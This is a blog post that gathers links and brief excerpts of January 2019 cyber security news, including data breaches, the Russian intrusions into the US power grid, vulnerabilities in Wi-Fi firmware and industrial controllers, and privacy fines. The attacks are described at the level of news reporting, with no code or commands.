Cyber Security News January 2019

This posting is here to collect cyber security news in January 2019.

I post links to security vulnerability news to comments of this article.

If you are interested in cyber security trends, read my Cyber security trends 2019 posting.

You are also free to post related links.

 

412 Comments

  1. Tomi Engdahl says:

    The Rise and Fall of Ashiyane – Iran’s Foremost Hacker Forum
    https://www.securityweek.com/rise-and-fall-ashiyane-irans-foremost-hacker-forum

    According to Recorded Future’s researchers, Iran’s hacking scene is a complex mix of government-sponsored contractors. The most prominent feature in modern Iranian history is its tendency to employ proxies for extra-national activities; such as Hezbollah against Israel and Yemen rebels against Saudi Arabia.

    Reply
  2. Tomi Engdahl says:

    Hackers Can Abuse Legitimate Features to Hijack Industrial Controllers
    https://www.securityweek.com/hackers-can-abuse-legitimate-features-hijack-industrial-controllers-expert

    Hackers can abuse legitimate features present in industrial controllers to hijack these devices and leverage them to gain a foothold in a network, a researcher warns.

    Programmable logic controllers (PLCs) allow users to control and monitor physical processes in industrial environments. While these types of devices are known to have vulnerabilities, including ones that could be leveraged to create a dangerous worm, researchers have shown in the past that malicious actors may also be able to abuse legitimate PLC features to achieve their goals.

    Roee Stark, a senior software engineer at industrial cybersecurity firm Indegy, has now demonstrated another type of attack that only leverages legitimate features. The expert has analyzed PLCs made by Rockwell Automation and found that certain Common Industrial Protocol (CIP) commands can be abused for malicious purposes.

    Reply
  3. Tomi Engdahl says:

    Cops told: No, you can’t have a warrant to force a big bunch of people to unlock their phones by fingerprint, face scans
    https://www.theregister.co.uk/2019/01/14/biometric_device_access/

    Judge rules compelled use of biometrics runs into Fifth Amendment protections

    Reply
  4. Tomi Engdahl says:

    Over 140 International Airlines Affected by Major Security Breach
    https://www.bleepingcomputer.com/news/security/over-140-international-airlines-affected-by-major-security-breach/

    Potential attackers could view and change private information in flight bookings made by millions of customers of major international airlines because of a security issue in the Amadeus online booking system found by Safety Detective’s Noam Rotem.

    Currently, the Amadeus ticket booking system is being used by 141 international airlines which gives it control over 44% of the global online reservation market, with United Airlines, Lufthansa, and Air Canada being some of its clients.

    As described by Safety Detective’s research labs, the security bug was found when trying to book a flight on the EL AL airline, Israel’s national carrier, which sent the security researchers “the following link to check our PNR: https://fly.elal.co.il/LOTS-OF-NUMBERS-HERE.”

    Reply
  5. Tomi Engdahl says:

    Researcher shows how popular app ES File Explorer exposes Android device data
    https://techcrunch.com/2019/01/16/android-app-es-file-explorer-expose-data/

    hy is one of the most popular Android apps running a hidden web server in the background?

    ES File Explorer claims it has more than 500 million downloads under its belt since 2014, making it one of the most used apps to date. Its simplicity makes it what it is: a simple file explorer that lets you browse through your Android phone or tablet’s file system for files, data, documents and more.

    But behind the scenes, the app is running a slimmed-down web server on the device. In doing so, it opens up the entire Android device to a whole host of attacks — including data theft.

    Baptiste Robert, a French security researcher who goes by the online handle Elliot Alderson, found the exposed port last week, and disclosed his findings in several tweets on Wednesday. Prior to tweeting, he showed TechCrunch how the exposed port could be used to silently exfiltrate data from the device.

    “All connected devices on the local network can get [data] installed on the device,” he said.

    Using a simple script he wrote, Robert demonstrated how he could pull pictures, videos and app names — or even grab a file from the memory card

    Robert said app versions 4.1.9.5.2 and below have the open port.

    “It’s clearly not good,”

    We contacted the makers of ES File Explorer but did not hear back prior to publication.

    https://www.tivi.fi/Kaikki_uutiset/kaytatko-sinakin-tata-suursuosittua-android-sovellusta-jarkyttava-vaara-poista-heti-olen-varma-etta-se-on-tahallaan-nain-6755338

    Reply
  6. Tomi Engdahl says:

    Top GP: Medical app Your.MD’s data security wasn’t my remit
    Prof Maureen Baker told tribunal info security and clinical safety are two separate things
    https://www.theregister.co.uk/2019/01/17/your_md_medical_symptom_app_employment_tribunal/

    The founders of medical symptom-checker app Your.MD knew that a number of key medical information databases were “open to anyone who knows the URL”, emails seen by a London tribunal have revealed.

    revealed:

    Your.MD execs were aware that five key databases were “publicly available to the internet” in June 2017;
    the firm had no way of validating, at the time, that business-critical microservices “still work[ed] to specification” following changes; and
    data from Your.MD’s medical knowledge database, Alexandria, “can be downloaded worldwide, and modified, without even a password”.

    In addition, a Facebook chatbot devised by Your.MD allegedly allowed its Facebook page admins direct access to customers’ health data.

    Professor Baker responded to Hochhauser’s early line of questioning about data security by saying: “If I can expand. I’m really focused on the medical and professional aspects. I’m not – I didn’t have any discussions about the tech or the presentations and this hasn’t come up in the discussions I’ve had with the medical teams.”

    Her Scottish lilt remaining level and clear in the well-heated hearing room, she added: “I’m talking here specifically about clinical safety. Clinical safety and data security are not the same thing… that’s not my remit.”

    Surely, asked Hochhauser, the Alexandria medical knowledge database being unsecured meant that “a malicious person could make the service misdiagnose dangerous conditions?”

    Baker said in response that while any abuses like that would be “deplorable and highly unsatisfactory”, systems involving medical records do require people to have access to it “in order to do their jobs: the same could be said of any receptionist or administrator in any healthcare system”.

    Reply
  7. Tomi Engdahl says:

    What we learned by unpacking a recent wave of Imminent RAT infections using AMP
    https://blog.talosintelligence.com/2019/01/what-we-learned-by-unpacking-recent.html

    Reply
  8. Tomi Engdahl says:

    Malware Built to Hack Building Automation Systems
    Researchers dig into vulnerabilities in popular building automation systems, devices.
    https://www.darkreading.com/vulnerabilities—threats/malware-built-to-hack-%20building-automation-systems/d/d-id/1333671

    S4x19 — Miami — Researchers who discovered multiple vulnerabilities in building automation system (BAS) equipment have also constructed proof-of-concept malware to exploit some of those security weaknesses.

    Reply
  9. Tomi Engdahl says:

    773M Password ‘Megabreach’ is Years Old
    https://krebsonsecurity.com/2019/01/773m-password-megabreach-is-years-old/

    My inbox and Twitter messages positively lit up today with people forwarding stories from Wired and other publications about a supposedly new trove of nearly 773 million unique email addresses and 21 million unique passwords that were posted to a hacking forum. A story in The Guardian breathlessly dubbed it “the largest collection ever of breached data found.” But in an interview with the apparent seller, KrebsOnSecurity learned that it is not even close to the largest gathering of stolen data, and that it is at least two to three years old.

    Largest collection ever of breached data found
    https://www.theguardian.com/technology/2019/jan/17/breached-data-largest-collection-ever-seen-email-password-hacking?CMP=fb_a-technology_b-gdntech

    Reply
  10. Tomi Engdahl says:

    Happy Thursday! 770 MEEELLLION email addresses and passwords found in yuge data breach
    Now is a good time to get a password manager app
    https://www.theregister.co.uk/2019/01/17/770m_emails_passwords_breach_collection_1/

    Reply
  11. Tomi Engdahl says:

    Misconfigured Server Leaks Oklahoma Department of Securities Data
    https://www.securityweek.com/misconfigured-server-leaks-oklahoma-department-securities-data

    A storage server configured for public access was found to expose terabytes of data belonging to the Oklahoma Department of Securities, UpGuard reveals.

    The server was found on December 7 and Oklahoma was notified of the exposure on December 8, when public access was removed. While it’s uncertain for how long the data store was exposed, the server first appeared on Shodan (a search engine for Internet-facing IP addresses) on November 30.

    The data on the server totaled three terabytes and millions of files, containing personal information, system credentials, internal documentation, and communications intended for the Oklahoma Securities Commission, among others.

    “The amount, and reach, of administrative and staff credentials represents a significant impact to the Oklahoma Department of Securities’ network integrity,” UpGuard says.

    Reply
  12. Tomi Engdahl says:

    America’s Electric Grid Has a Vulnerable Back Door—and Russia Walked Through It
    https://outline.com/3BxDdG

    One morning in March 2017, Mike Vitello’s work phone lighted up. Customers wanted to know about an odd email they had just received. What was the agreement he wanted signed? Where was the attachment?

    Mr. Vitello had no idea what they were talking about.

    Then, a few months later, the U.S. Department of Homeland Security dispatched a team to examine the company’s computers. You’ve been attacked, a government agent told Mr. Vitello’s colleague, Dawn Cox. Maybe by Russians. They were trying to hack into the power grid.

    “They were intercepting my every email,” Mr. Vitello says. “What the hell? I’m nobody.”

    “It’s not you. It’s who you know,” says Ms. Cox.

    The cyberattack on the 15-person company near Salem, Ore., which works with utilities and government agencies, was an early thrust in the worst known hack by a foreign government into the nation’s electric grid. It set off so many alarms that the U.S. government took the unusual step in early 2018 of publicly blaming the Russian government.

    A reconstruction of the hack reveals a glaring vulnerability at the heart of the country’s electric system. Rather than strike the utilities head on, the hackers went after the system’s unprotected underbelly—hundreds of contractors and subcontractors like All-Ways who had no reason to be on high alert against foreign agents.

    The scheme’s success came less from its technical prowess—though the attackers did use some clever tactics—than in how it exploited trusted business relationships using impersonation and trickery.

    The hackers planted malware on sites of online publications frequently read by utility engineers. They sent out fake résumés with tainted attachments, pretending to be job seekers. Once they had computer-network credentials, they slipped through hidden portals used by utility technicians, in some cases getting into computer systems that monitor and control electricity flows.

    The U.S. government hasn’t named the utilities or other companies that were targeted.

    “What Russia has done is prepare the battlefield without pulling the trigger,” says Robert P. Silvers, former assistant secretary for cyber policy at Homeland Security and now a law partner at Paul Hastings LLP.

    According to a CFE email, the agent told employees that “highly sophisticated individuals” had uploaded a malicious file onto the website for Control Engineering. The agent warned it could be used to launch hostile actions against others.

    By planting a few lines of code on the websites, the attackers invisibly plucked computer usernames and passwords from unsuspecting visitors, according to government briefings on the attack and security experts who have reviewed the malicious code. That tactic enabled the Russians to gain access to ever more sensitive systems

    On March 2, 2017, the attackers used Mr. Vitello’s account to send the mass email to customers, which was intended to herd recipients to a website secretly taken over by the hackers.

    Web developer Matt Hudson says he had no idea Russians had hacked into his site.

    Once Mr. Vitello realized his email had been hijacked, he tried to warn his contacts not to open any email attachments from him. The hackers blocked the message.

    In June 2017, the hackers used the Corvallis company’s systems to go hunting. Over the next month, they accessed the Oregon company’s network dozens of times from computers with IP addresses registered in countries including Turkey, France and the Netherlands, targeting at least six energy firms.

    In some cases, the attackers simply studied the new targets’ websites, possibly as reconnaissance for future strikes. In other instances, the investigative report indicates, they may have gained footholds inside their victims’ systems.

    Two of the targeted companies had helped the Army create independent supplies of electricity for domestic bases.

    That June 30, the hackers sought remote access to an Indiana company that, like ReEnergy, installs equipment to allow government facilities to operate if the civilian grid loses power.

    Federal officials say the attackers looked for ways to bridge the divide between the utilities’ corporate networks, which are connected to the internet, and their critical-control networks, which are walled off from the web for security purposes.

    In briefings to utilities last summer, Jonathan Homer, industrial-control systems cybersecurity chief for Homeland Security, said the Russians had penetrated the control-system area of utilities through poorly protected jump boxes. The attackers had “legitimate access, the same as a technician,”

    Industry experts say Russian government hackers likely remain inside some systems, undetected and awaiting further orders.

    Reply
  13. Tomi Engdahl says:

    Facebook’s ’10 Year Challenge’ Is Just a Harmless Meme—Right?
    https://www.wired.com/story/facebook-10-year-meme-challenge/?utm_source=facebook&utm_medium=social&utm_campaign=wired&utm_brand=wired&utm_social-type=owned&mbid=social_fb&fbclid=IwAR3ek86fZtIvZq_KBe1lJWm55Qqsd8jxzCZFrQNq_Jy21-gSLm4wp_SV-Vc

    If you use social media, you’ve probably noticed a trend across Facebook, Instagram, and Twitter of people posting their then-and-now profile pictures, mostly from 10 years ago and this year.

    Through the Facebook meme, most people have been helpfully adding that context back in (“me in 2008 and me in 2018”) as well as further info, in many cases, about where and how the pic was taken (“2008 at University of Whatever, taken by Joe; 2018 visiting New City for this year’s such-and-such event”).

    In other words, thanks to this meme, there’s now a very large dataset of carefully curated photos of people from roughly 10 years ago and now.

    For its part, Facebook denies having any hand in the #10YearChallenge. “This is a user-generated meme that went viral on its own,” a Facebook spokesperson responded.

    But even if this particular meme isn’t a case of social engineering, the past few years have been rife with examples of social games and memes designed to extract and collect data. Just think of the mass data extraction of more than 70 million US Facebook users performed by Cambridge Analytica.

    Is it bad that someone could use your Facebook photos to train a facial recognition algorithm? Not necessarily; in a way, it’s inevitable. Still, the broader takeaway here is that we need to approach our interactions with technology mindful of the data we generate and how it can be used at scale. I’ll offer three plausible use cases for facial recognition: one respectable, one mundane, and one risky.

    Reply
  14. Tomi Engdahl says:

    https://www.tivi.fi/Kaikki_uutiset/suomalainen-teollisuusjatti-kasvaa-kyberturvallisuusyhtioksi-hyokkaajien-motiivit-ovat-muuttumassa-6755286

    Wärtsilä hakee uutta kasvua kyberturvallisuuspalveluista. Wärtsilässä uskotaan, että yhtiöllä on mahdollisuuksia kasvattaa uusien kyberpalveluiden myötä sekä laite- että palvelumyyntiään meri- ja energiateollisuudessa.

    Reply
  15. Tomi Engdahl says:

    US bills would ban exports to Chinese telecoms that violate sanctions
    Huawei and ZTE are singled out as potential targets.
    https://www.engadget.com/2019/01/16/us-bills-ban-exports-to-chinese-telecoms/

    American politicians want to crack down further on Chinese telecoms like Huawei and ZTE. Members of both the House of Representatives and the Senate have introduced bills that would order the President to impose export bans on Chinese telecoms found to violate US export and sanctions laws. Companies like Huawei and ZTE are a “growing threat to American national security,” according to co-sponsor Rep. Mike Gallagher, and they should face the same punishment that ZTE faced before its reprieves.

    The politicians aren’t shy about the reasons behind the move. This is partly in response to the arrest of Huawei CFO Meng Wanzhou in Canada over US allegations she helped her company violate US trade sanctions against Iran. This would potentially force the President to ban Huawei’s US-based equipment exports, limiting its ability to do business around the world. It wouldn’t be as severe a blow as it was for ZTE, since Huawei designs its own mobile processors, but it could have a noticeable effect.

    Reply
  16. Tomi Engdahl says:

    Joseph Cox / Motherboard:
    Some hacked Instagram influencers who find its account recovery process cumbersome are turning to third-party experts and white hat hackers to regain access

    Hacked Instagram Influencers Rely on White-Hat Hackers to Get Their Accounts Back
    https://motherboard.vice.com/en_us/article/59vnvk/hacked-instagram-influencers-get-accounts-back-white-hat-hackers

    Leaked internal documents and stories from influencers show that Instagram has an influencer-hacking problem.

    Reply
  17. Tomi Engdahl says:

    ‘Tracking every place you go’: Weather Channel app accused of selling user data
    https://amp.theguardian.com/technology/2019/jan/04/weather-channel-app-lawsuit-location-data-selling

    Most popular mobile weather app misled users who shared location information, say Los Angeles prosecutors in lawsuit

    Reply
  18. Tomi Engdahl says:

    Employee Falls for Fake Job Interview Over Skype, Gives North Korean Hackers Access to Chile’s ATM Network: Report
    https://gizmodo.com/employee-falls-for-fake-job-interview-over-skype-gives-1831801832

    The one thing no one expects on a job interview is North Korean hackers picking up on the other line. But that’s apparently exactly what happened to a hapless employee at Redbanc, the company that handles Chile’s ATM network.

    The bizarre story was reported in trendTIC, a Chilean tech site. A Redbanc employee found a job opening on LinkedIn for a developer position.

    Reply
  19. Tomi Engdahl says:

    Massive breach leaks 773 million emails, 21 million passwords
    https://www.cnet.com/news/massive-breach-leaks-773-million-emails-21-million-passwords/

    The best time to stop reusing old passwords was 10 years ago. The second best time is now.

    Reply
  20. Tomi Engdahl says:

    Washington Post:
    Sources: FTC commissioners met to discuss imposing a record-setting fine against Facebook for failing to safeguard user privacy, violating 2011 consent decree
    http://www.washingtonpost.com/technology/2019/01/18/us-regulators-have-met-discuss-imposing-record-setting-fine-against-facebook-some-its-privacy-violations/

    Reply
  21. Tomi Engdahl says:

    Dami Lee / The Verge:
    Verizon says its spam and robocall protection service, previously available as a $3 add-on, will be free to all subscribers starting in March — Verizon announced this week that it will offer free spam and robocall protection to its subscribers starting in March.

    Verizon will offer free spam protection to all of its customers
    https://www.theverge.com/2019/1/18/18188140/verizon-free-spam-robocall-protection

    Reply
  22. Tomi Engdahl says:

    Sarah Perez / TechCrunch:
    Twitter says a bug led to the “Protect your Tweets” setting being disabled for some Android users for almost five years, making their tweets public

    Twitter bug revealed some Android users’ private tweets
    https://techcrunch.com/2019/01/17/twitter-bug-revealed-some-android-users-private-tweets/

    Twitter accidentally revealed some users’ “protected” (aka, private) tweets, the company disclosed this afternoon. The “Protect your Tweets” setting typically allows people to use Twitter in a non-public fashion. These users get to approve who can follow them and who can view their content. For some Android users over a period of several years, that may not have been the case — their tweets were actually made public as a result of this bug.

    Reply
  23. Tomi Engdahl says:

    How U.S. surveillance technology is propping up authoritarian regimes
    https://www.washingtonpost.com/outlook/2019/01/17/how-us-surveillance-technology-is-propping-up-authoritarian-regimes/

    NSO Group, an Israeli cyberintelligence firm, makes spyware that it sells to a variety of government clients around the world. It has denied that those surveillance products were involved in the torture and murder of Washington Post journalist Jamal Khashoggi, although it has neither confirmed nor denied selling its products to the Saudi government — elements of which, the CIA has concluded, ordered the killing.

    Reply
  24. Tomi Engdahl says:

    Norway Readies ‘Big Brother’ GPS-Based Taxation Per Mile-Driven
    https://www.zerohedge.com/news/2019-01-17/norway-readies-big-brother-gps-based-taxation-mile-driven

    The Norwegian Data Protection Authority is now arguing that GPS based taxation, for the amount of kilometers driven by car, can be done within 5-6 years!

    Norwegians trust the government way too much, because they believe that this system will eliminate the need for road tax, fuel tax, toll roads and reduce the cost of car insurance.

    No way will the tax be reduced! GPS based taxation is a governments dream! Who is to stop them from issuing parking fees or speeding tickets?

    Reply
  25. Tomi Engdahl says:

    Catalin Cimpanu / ZDNet:
    Researcher: vulnerability in Marvell’s Wi-Fi SoC used in the PS4, Xbox One, Surface tablets, and more lets attacker hijack devices without any user interaction

    WiFi firmware bug affects laptops, smartphones, routers, gaming devices
    https://www.zdnet.com/article/wifi-firmware-bug-affects-laptops-smartphones-routers-gaming-devices/

    List of impacted devices includes PS4, Xbox One, Samsung Chromebooks, and Microsoft Surface devices.

    Details have been published today about a vulnerability affecting the firmware of a popular WiFi chipset deployed in a wide range of devices, such as laptops, smartphones, gaming rigs, routers, and Internet of Things (IoT) devices.

    Selianin described how someone could exploit the ThreadX firmware installed on a Marvell Avastar 88W8897 wireless chipset to execute malicious code without any user interaction.

    The researcher chose this WiFi SoC (system-on-a-chip) because this is one of the most popular WiFi chipsets on the market, being deployed with devices such as Sony PlayStation 4, Xbox One, Microsoft Surface laptops, Samsung Chromebooks, Samsung Galaxy J1 smartphones, and Valve SteamLink cast devices, just to name a few.

    Selianin’s report contains the technical details on exploiting the vulnerability

    Remotely compromise devices by using bugs in Marvell Avastar Wi-Fi: from zero knowledge to zero-click RCE
    https://embedi.org/blog/remotely-compromise-devices-by-using-bugs-in-marvell-avastar-wi-fi-from-zero-knowledge-to-zero-click-rce/

    Reply
  26. Tomi Engdahl says:

    Nicole Perlroth / New York Times:
    DNC says in court filing that it was a target of a failed spearphishing campaign after the midterms; researchers: the campaign resembled Russia-linked attacks — SAN FRANCISCO — The Democratic National Committee believes it was targeted in a hacking attempt by a Russian group in the weeks …

    D.N.C. Says It Was Targeted Again by Russian Hackers After ’18 Election
    https://www.nytimes.com/2019/01/18/technology/dnc-russian-hacking.html

    The committee said in new court filings that it was targeted in an attempted hacking by a Russian group after the midterm elections.

    On Nov. 14, the documents say, dozens of D.N.C. email addresses were on the receiving end of a so-called spearphishing campaign by one of two Russian organizations believed to be responsible for hacking into the committee’s computers during the 2016 presidential race. There is no evidence that the most recent attack was successful.

    The documents, filed in federal court in New York, were part of an amended complaint in a lawsuit filed in April that claimed the committee was the victim of a conspiracy by Russian intelligence agents, President Trump’s 2016 campaign and WikiLeaks to damage Hillary Clinton’s presidential run.

    Reply
  27. Tomi Engdahl says:

    Nicole Perlroth / New York Times:
    DNC says in court filing that it was a target of a failed spearphishing campaign after the midterms; researchers: the campaign resembled Russia-linked attacks

    D.N.C. Says It Was Targeted Again by Russian Hackers After ’18 Election
    https://www.nytimes.com/2019/01/18/technology/dnc-russian-hacking.html

    The Democratic National Committee believes it was targeted in a hacking attempt by a Russian group in the weeks after the midterm elections last year, according to court documents filed late Thursday.

    Reply
  28. Tomi Engdahl says:

    Popular WordPress plugin hacked by angry former employee
    https://www.zdnet.com/article/popular-wordpress-plugin-hacked-by-angry-former-employee/#ftag=RSSbaffb68

    Hacker defaced the company’s website and sent a mass email to all its customers, alleging unpatched security holes.

    The plugin in question is WPML (or WP MultiLingual), the most popular WordPress plugin for translating and serving WordPress sites in multiple languages.

    According to its website, WPML has over 600,000 paying customers and is one of the very few WordPress plugins that is so reputable that it doesn’t need to advertise itself with a free version on the official WordPress.org plugins repository.

    https://wpml.org/

    Reply
  29. Tomi Engdahl says:

    Catalin Cimpanu / ZDNet:
    A casino group behind sites like easybet.com left 108M+ records exposed on a server including players’ bets, withdrawals, names, home addresses, phone numbers

    Online casino group leaks information on 108 million bets, including user details
    https://www.zdnet.com/article/online-casino-group-leaks-information-on-108-million-bets-including-user-details/

    Server is now down but is unclear if the cloud provider took it down and if the parent company knows it leaked users details in the first place.

    Reply
  30. Tomi Engdahl says:

    Romain Dillet / TechCrunch:
    Google fined €50M by French watchdog CNIL under GDPR for alleged lack of transparency, info, and consent about ads personalization in Android’s onboarding flow

    French data protection watchdog fines Google $57 million under the GDPR
    https://techcrunch.com/2019/01/21/french-data-protection-watchdog-fines-google-57-million-under-the-gdpr/

    Reply
  31. Tomi Engdahl says:

    Websites can steal browser data via extensions APIs
    https://www.zdnet.com/article/websites-can-steal-browser-data-via-extensions-apis/

    Researcher finds nearly 200 Chrome, Firefox, and Opera extensions vulnerable to attacks from malicious sites.

    Malicious websites can exploit browser extension APIs to execute code inside the browser and steal sensitive information such as bookmarks, browsing history, and even user cookies.

    The latter, an attacker can use to hijack a user’s active login sessions and access sensitive accounts, such as email inboxes, social media profiles, or work-related accounts.

    Furthermore, the same extension APIs can also be abused to trigger the download of malicious files and store them on the user device, and store and retrieve data in an extension’s permanent storage, data that can later be used to track users across the web.

    Reply
  32. Tomi Engdahl says:

    Fortnite security issue would have granted hackers access to accounts
    https://www.zdnet.com/article/fortnite-security-issue-would-have-granted-hackers-access-to-accounts/

    Check Point recommends that Fortnite players enable two-factor authentication (2FA) for their accounts.

    Reply
  33. Tomi Engdahl says:

    Cyber security: This giant blind spot will cost us dear
    https://www.zdnet.com/article/cyber-security-this-giant-blind-spot-will-cost-us-dear/

    Cyber attacks are one of the biggest risks facing the world. Our inability to address the underlying issues risks disaster.

    Reply
  34. Tomi Engdahl says:

    Security
    This cryptocurrency mining malware now disables security software to help remain undetected
    https://www.zdnet.com/article/this-cryptocurrency-mining-malware-now-disables-security-software-to-help-remain-undetected/

    Reply
  35. Tomi Engdahl says:

    Bipartisan Bill introduced to ban sale of US tech to Huawei and ZTE
    https://www.zdnet.com/article/bipartisan-bill-introduced-to-ban-sale-of-us-tech-to-huawei-and-zte/

    US lawmakers introduce bipartisan Bill that, if passed, would ban the export of US chips and other components to the two Chinese tech companies.

    Reply
  36. Tomi Engdahl says:

    Russian Watchdog Launches ‘Administrative Proceedings’ Against Facebook, Twitter
    https://www.securityweek.com/russian-watchdog-launches-administrative-proceedings-against-facebook-twitter

    Russia’s media watchdog Roskomnadzor launched “administrative proceedings” Monday against US social media giants Facebook and Twitter, accusing them of not complying with Russian law, news agencies reported.

    “Today, Roskomnadzor begins administrative proceedings against both companies (Facebook and Twitter),” the watchdog’s head Alexander Zharov told the Interfax news agency.

    The state regulator has repeatedly warned the companies they could be banned if they do not comply with a 2014 law requiring social networking sites to store the personal data of Russian users inside the country.

    Reply
  37. Tomi Engdahl says:

    Proposed Law Classifies Ransomware Infection as a Data Breach
    https://www.securityweek.com/proposed-law-classifies-ransomware-infection-data-breach

    The newly announced Act to Strengthen Identity Theft Protections in North Carolina proposes that ransomware attacks be treated as data breaches.

    Unveiled last week by Attorney General Josh Stein and Rep. Jason Saine, the legislation proposes that, in addition to incidents where data is stolen, even unauthorized access to someone’s personal information should be considered a data breach.

    Thus, ransomware attacks, where the victim’s personal information is only accessed, without being necessarily stolen, will be included in the definition of data breaches, and organizations will have to report these incidents as well.

    Reply
  38. Tomi Engdahl says:

    Let’s Encrypt Begins Retirement of TLS-SNI-01 Validation
    https://www.securityweek.com/lets-encrypt-begins-retirement-tls-sni-01-validation

    Free and open Certificate Authority (CA) Let’s Encrypt today started the process of completely retiring TLS-SNI-01 validation support.

    Let’s Encrypt decided last year that it would disable support for the TLS-SNI-01 validation after learning that users could abuse it to obtain certificates for domains they do not own. The problem, the CA revealed at the time, was the use of the ACME TLS-SNI-01 challenge type for domains on a shared hosting infrastructure.

    Although the issue wasn’t related to the certificate authority itself, but instead the result of a combination of factors, Let’s Encrypt decided that disabling support for the validation method was the best way to handle the situation at the time.

    Reply
  39. Tomi Engdahl says:

    Unofficial Patches Released for Three Unfixed Windows Flaws
    https://www.securityweek.com/unofficial-patches-released-three-unfixed-windows-flaws

    ACROS Security’s 0patch service has released unofficial patches for three Windows vulnerabilities that Microsoft has yet to address, including denial-of-service (DoS), file read, and code execution issues.

    Reply
  40. Tomi Engdahl says:

    Community Project Crushes 100,000 Malware Sites in 10 Months
    https://www.securityweek.com/community-project-crushes-100000-malware-sites-10-months

    Nearly 100,000 malware distribution websites have been identified and taken down over the course of 10 months as part of an abuse.ch project called URLhaus.

    Launched at the end of March 2018 with the purpose of collecting and sharing URLs used for malware distribution, the project has already proven a great success and enjoyed help from the community, abuse.ch says.

    During the past 10 months, 265 security researchers around the world have identified and submitted in average 300 malware sites each day. On average, URLhaus counts between 4,000 and 5,000 active malware distribution sites daily.

    “2/3 of the top malware hosting networks are hosted either in the US or China,” abuse.ch reveals.

    Reply
  41. Tomi Engdahl says:

    Hacker Uses Nest Camera to Broadcast Hoax Nuke Alert
    https://www.securityweek.com/hacker-uses-nest-camera-broadcast-hoax-nuke-alert

    Nest urged owners of its security cameras Tuesday to use enhanced authentication to thwart hackers, after one terrified a family with a hoax nuclear missile attack.

    A couple living in a California town near San Francisco told local media they experienced “sheer terror” over the weekend when a Nest security camera atop their family’s television issued a realistic-sounding warning of missiles heading to the United States from North Korea.

    Reply
  42. Tomi Engdahl says:

    How Web Apps Can Turn Browser Extensions Into Backdoors
    https://threatpost.com/web-apps-browser-extensions-backdoors/141061/

    Researchers show how rogue web applications can be used to attack vulnerable browser extensions in a hack that gives adversaries access to private user data.

    Researchers have added another reason to be suspicious of web browser extensions. According to a recently published academic report, various Chrome, Firefox and Opera browser extensions can be compromised by an adversary that can steal sensitive browser data and plant arbitrary files on targeted systems.

    “We identified a good number of extensions that can be exploited by web applications to benefit from their privileged capabilities,”

    http://www-sop.inria.fr/members/Doliere.Some/papers/empoweb.pdf

    Reply
  43. Tomi Engdahl says:

    From the NSA to Silicon Valley, a new kind of encryption is going commercial
    https://www.cyberscoop.com/homomorphic-encryption-nsa-silicon-valley-commercial/

    Encryption as we know it is on the brink of a major advancement: Mathematics teams at IBM, Intel, Microsoft and a range of startup firms are pushing ahead with research that could make it possible for technology companies to encrypt data while it’s in use.

    This kind of security, known as homomorphic encryption, would mark a significant upgrade over current forms of encryption, which secure data while it’s stored or while it’s moving through a connection. Homomorphic encryption would better protect users who are using internet searches and accessing stored credit numbers as well as businesses that are sharing proprietary data as part of information sharing programs.

    Homomorphic encryption soon will help large companies protect their information at times when they need to share it in a multi-party computing environment, Horvath said.

    Reply
  44. Tomi Engdahl says:

    Malware, User Privacy Failures Found in Top Free VPN Android Apps
    https://www.bleepingcomputer.com/news/security/malware-user-privacy-failures-found-in-top-free-vpn-android-apps/

    One in five apps from the top 150 free VPN Android apps in Google’s Play Store was flagged as a potential source of malware, while a quarter of them come with user privacy breaking bugs such as DNS leaks which expose user DNS queries to their ISPs.

    Reply

Leave a Comment

Your email address will not be published. Required fields are marked *

*

*